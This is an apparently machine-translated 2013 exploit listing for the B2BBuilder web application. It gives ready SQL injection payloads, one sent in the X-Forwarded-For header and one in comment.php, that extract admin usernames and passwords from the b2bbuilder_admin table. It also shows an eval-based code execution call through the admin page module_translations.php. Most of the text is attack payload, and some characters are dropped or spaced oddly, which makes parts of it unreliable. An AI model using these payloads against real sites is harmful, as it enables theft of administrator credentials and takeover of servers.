B2BBuilder two injection+background arbitrary code execution exploit-vulnerability warning-the black bar safety net

2013-10-07T00:00:00
ID MYHACK58:62201340872
Type myhack58
Reporter 佚名
Modified 2013-10-07T00:00:00

Description

1, The B2BBuilder head injection background arbitrary code execution

The structure of the head test:

x-forwarded-for:' and(select 1 from(select count(),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a) and '1'='1

Background arbitrary code execution

In the eval with;it can respectively execute the two commands, visit:

http://www.0day5.com/admin/module_translations.php?mod=;phpinfo()

2, the B2BBuilder a further injection vulnerability

Proof of account:

http://www.0day5.com/comment.php?ctype=2&conid=1 6 8 7 3%20and(select%2 0 1%20from(select%20count(*),

concat((select%2 0(select%2 0(select%20concat(user,0x3A,password)%2 0

from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%2 0)%2 0

from%2 0information_schema. tables%20limit%200,1),floor(rand(0)*2))x%2 0

from%2 0information_schema. tables%20group%20by%20x)a)%20and%2 0 1=1

Proof password:

http://www.0day5.com/comment.php?ctype=2&conid=1 6 8 7 3 and(select 1 from(select count(),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(b2bbuilder_admin. password as char))),0x27,0x7e) from b2bbuilder. b2bbuilder_admin Order by user limit 1,1) ) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a) and 1=1

Source: http://0day5.com/archives/772